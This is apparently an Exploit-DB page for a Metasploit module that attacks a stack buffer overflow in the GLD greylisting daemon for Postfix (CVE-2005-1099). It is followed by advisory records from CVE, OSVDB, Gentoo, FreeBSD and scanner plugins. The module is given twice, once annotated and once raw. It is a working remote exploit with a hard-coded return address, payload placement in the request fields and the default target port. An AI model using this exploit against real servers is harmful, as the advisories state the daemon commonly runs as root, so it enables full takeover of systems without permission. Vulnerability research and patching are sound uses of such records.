ID EDB-ID:10023 Type exploitdb Reporter patrick Modified 2005-04-12T00:00:00
Description
Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow. CVE-2005-1099. Remote exploit for the Linux platform.
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Metasploit module for the stack buffer overflow in the GLD (Greylisting
# Daemon) for Postfix, versions <= 1.4 (CVE-2005-1099). The records quoted
# further down this page state the issue was fixed in GLD 1.5 and that
# exposure is reduced by binding the daemon to the loopback address or only
# accepting connections from trusted SMTP servers.
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  # Declarative module metadata. The framework reads this to choose the
  # target's return address, the payload constraints and the default port;
  # nothing here touches the network.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
      'Description'   => %q{
        This module exploits a stack overflow in the Salim Gasmi
        GLD <= 1.4 greylisting daemon for Postfix. By sending an
        overly long string the stack can be overwritten.
      },
      'Version'       => '$Revision$',
      'Author'        => [ 'patrick' ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'linux',
      'References'    =>
        [
          [ 'CVE', '2005-1099' ],
          [ 'OSVDB', '15492' ],
          [ 'BID', '13129' ],
          [ 'URL', 'http://www.milw0rm.com/exploits/934' ],
        ],
      # Privileged: the advisories on this page note the daemon commonly runs
      # as root, which is why this class of bug is rated CVSS 10.0.
      'Privileged'    => true,
      'License'       => MSF_LICENSE,
      # Payload constraints. The excluded bytes (NUL, LF, CR, space, '=') are
      # consistent with the key=value / CRLF request format built in #exploit,
      # where any of them would terminate or split a field.
      'Payload'       =>
        {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d\x20=",
          'StackAdjustment' => -3500,
        },
      # A single hard-coded return address for one distribution build; the
      # module presumably only works reliably against that exact build.
      'Targets'       =>
        [
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
        ],
      'DefaultTarget' => 0
    ))

    # RPORT defaults to 2525, the TCP port the OSVDB record on this page
    # associates with GLD.
    register_options(
      [
        Opt::RPORT(2525)
      ],
      self.class
    )
  end

  # Opens one TCP connection and sends a single greylisting request: the
  # encoded payload in the `sender` field, then a `client_address` field made
  # of 300 copies of the target return address, terminated by a blank line.
  # Control then passes to the payload handler before disconnecting.
  def exploit
    connect

    sploit = "sender="+ payload.encoded + "\r\n"
    # 'V' packs the return address as an unsigned 32-bit little-endian value,
    # matching the x86 target.
    sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

    sock.put(sploit)
    handler
    disconnect
  end
end
{"bulletinFamily": "exploit", "id": "EDB-ID:10023", "cvelist": ["CVE-2005-1099"], "modified": "2005-04-12T00:00:00", "lastseen": "2016-02-01T11:45:09", "edition": 1, "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\n\tclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\tThis module exploits a stack overflow in the Salim Gasmi\r\n\t\t\t\tGLD <= 1.4 greylisting daemon for Postfix. By sending an\r\n\t\t\t\toverly long string the stack can be overwritten.\r\n\t\t\t},\r\n\t\t\t'Version'\t=> '$Revision$',\r\n\t\t\t'Author'\t=> [ 'patrick' ],\r\n\t\t\t'Arch'\t\t=> ARCH_X86,\r\n\t\t\t'Platform'\t=> 'linux',\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-1099' ],\r\n\t\t\t\t\t[ 'OSVDB', '15492' ],\r\n\t\t\t\t\t[ 'BID', '13129' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/934' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged'\t=> true,\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20=\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget'\t=> 0\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(2525)\r\n\t\t\t],\r\n\t\t\tself.class\r\n\t\t)\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = \"sender=\"+ payload.encoded + \"\\r\\n\"\r\n\t\tsploit << 
\"client_address=\" + [target['Ret']].pack('V') * 300 + \"\\r\\n\\r\\n\"\r\n\r\n\t\tsock.put(sploit)\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "published": "2005-04-12T00:00:00", "href": "https://www.exploit-db.com/exploits/10023/", "osvdbidlist": ["15492"], "reporter": "patrick", "hash": "322b28599e459563647661e601e352d98a5de6535f278731e6a3993273ff6194", "title": "Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Salim Gasmi GLD 1.0 - 1.4 Postfix Greylisting Buffer Overflow. CVE-2005-1099. Remote exploit for linux platform", "references": [], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10023/", "viewCount": 2, "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2005-1099", "type": "cve", "title": "CVE-2005-1099", "description": "Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code.", "published": "2005-04-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1099", "cvelist": ["CVE-2005-1099"], "lastseen": "2017-07-11T11:14:51"}], "osvdb": [{"id": "OSVDB:15492", "type": "osvdb", "title": "GLD server.c Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in GLD. GLD fails to properly check boundaries in server.c functions resulting in a buffer overflow. With a specially crafted request, an attacker can cause execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 1.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in GLD. GLD fails to properly check boundaries in server.c functions resulting in a buffer overflow. 
With a specially crafted request, an attacker can cause execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.gasmi.net/gld.html\nSecurity Tracker: 1013678\n[Secunia Advisory ID:14941](https://secuniaresearch.flexerasoftware.com/advisories/14941/)\n[Secunia Advisory ID:14951](https://secuniaresearch.flexerasoftware.com/advisories/14951/)\n[Related OSVDB ID: 15493](https://vulners.com/osvdb/OSVDB:15493)\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200504-10.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0174.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0169.html\nKeyword: INetCop Security Advisory #2005-0x82-026\nKeyword: TCP port 2525\nKeyword: GreyList Daemon\n[CVE-2005-1099](https://vulners.com/cve/CVE-2005-1099)\n", "published": "2005-04-12T02:38:52", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:15492", "cvelist": ["CVE-2005-1099"], "lastseen": "2017-04-28T13:20:11"}], "packetstorm": [{"id": "PACKETSTORM:82242", "type": "packetstorm", "title": "GLD (Greylisting Daemon) Postfix Buffer Overflow", "description": "", "published": "2009-10-27T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/82242/GLD-Greylisting-Daemon-Postfix-Buffer-Overflow.html", "cvelist": ["CVE-2005-1099"], "lastseen": "2016-12-05T22:11:39"}], "exploitdb": [{"id": "EDB-ID:16841", "type": "exploitdb", "title": "GLD Greylisting Daemon Postfix Buffer Overflow", "description": "GLD (Greylisting Daemon) Postfix Buffer Overflow. CVE-2005-1099. 
Remote exploit for linux platform", "published": "2010-07-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/16841/", "cvelist": ["CVE-2005-1099"], "lastseen": "2016-02-02T06:38:24"}, {"id": "EDB-ID:25392", "type": "exploitdb", "title": "Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability", "description": "Salim Gasmi GLD 1.x Postfix Greylisting Daemon Buffer Overflow Vulnerability. CVE-2005-1099. Remote exploit for linux platform", "published": "2005-04-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/25392/", "cvelist": ["CVE-2005-1099"], "lastseen": "2016-02-03T01:16:13"}], "metasploit": [{"id": "MSF:EXPLOIT/LINUX/MISC/GLD_POSTFIX", "type": "metasploit", "title": "GLD (Greylisting Daemon) Postfix Buffer Overflow", "description": "This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.", "published": "2008-06-07T02:16:34", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "cvelist": ["CVE-2005-1099"], "lastseen": "2018-02-28T11:02:48"}], "nessus": [{"id": "FREEBSD_PKG_6C2D4F29AF3E11D9837D000E0C2E438A.NASL", "type": "nessus", "title": "FreeBSD : gld -- format string and buffer overflow vulnerabilities (6c2d4f29-af3e-11d9-837d-000e0c2e438a)", "description": "Gld has been found vulnerable to multiple buffer overflows as well as multiple format string vulnerabilities.\n\nAn attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root.\n\nThe FreeBSD port defaults to running gld as the root user. 
The risk of exploitation can be minimized by making gld listen on the loopback address only, or configure it to only accept connections from trusted smtp servers.", "published": "2005-07-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18974", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2017-10-29T13:37:20"}, {"id": "GENTOO_GLSA-200504-10.NASL", "type": "nessus", "title": "GLSA-200504-10 : Gld: Remote execution of arbitrary code", "description": "The remote host is affected by the vulnerability described in GLSA-200504-10 (Gld: Remote execution of arbitrary code)\n\n dong-hun discovered several buffer overflows in server.c, as well as several format string vulnerabilities in cnf.c.\n Impact :\n\n An attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root.\n Workaround :\n\n There is no known workaround at this time.", "published": "2005-04-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=18043", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2017-10-29T13:33:31"}], "freebsd": [{"id": "6C2D4F29-AF3E-11D9-837D-000E0C2E438A", "type": "freebsd", "title": "gld -- format string and buffer overflow vulnerabilities", "description": "\nGld has been found vulnerable to multiple buffer overflows as\n\t well as multiple format string vulnerabilities.\n\nAn attacker could exploit this vulnerability to execute\n\t arbitrary code with the permissions of the user running Gld,\n\t the default user being root.\n\nThe FreeBSD port defaults to running gld as the root user.\n\t The risk of exploitation can be minimized by making gld\n\t listen on the loopback address only, or configure it to only\n\t accept connections 
from trusted smtp servers.\n", "published": "2005-04-12T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vuxml.freebsd.org/freebsd/6c2d4f29-af3e-11d9-837d-000e0c2e438a.html", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2016-09-26T17:25:15"}], "openvas": [{"id": "OPENVAS:54912", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200504-10 (Gld)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200504-10.", "published": "2008-09-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=54912", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2017-07-24T12:49:44"}, {"id": "OPENVAS:52130", "type": "openvas", "title": "FreeBSD Ports: gld", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2008-09-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=52130", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2017-07-02T21:10:14"}], "gentoo": [{"id": "GLSA-200504-10", "type": "gentoo", "title": "Gld: Remote execution of arbitrary code", "description": "### Background\n\nGld is a standalone greylisting server for Postfix. \n\n### Description\n\ndong-hun discovered several buffer overflows in server.c, as well as several format string vulnerabilities in cnf.c. \n\n### Impact\n\nAn attacker could exploit this vulnerability to execute arbitrary code with the permissions of the user running Gld, the default user being root. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll Gld users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-filter/gld-1.5\"", "published": "2005-04-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://security.gentoo.org/glsa/200504-10", "cvelist": ["CVE-2005-1100", "CVE-2005-1099"], "lastseen": "2016-09-06T19:46:59"}]}}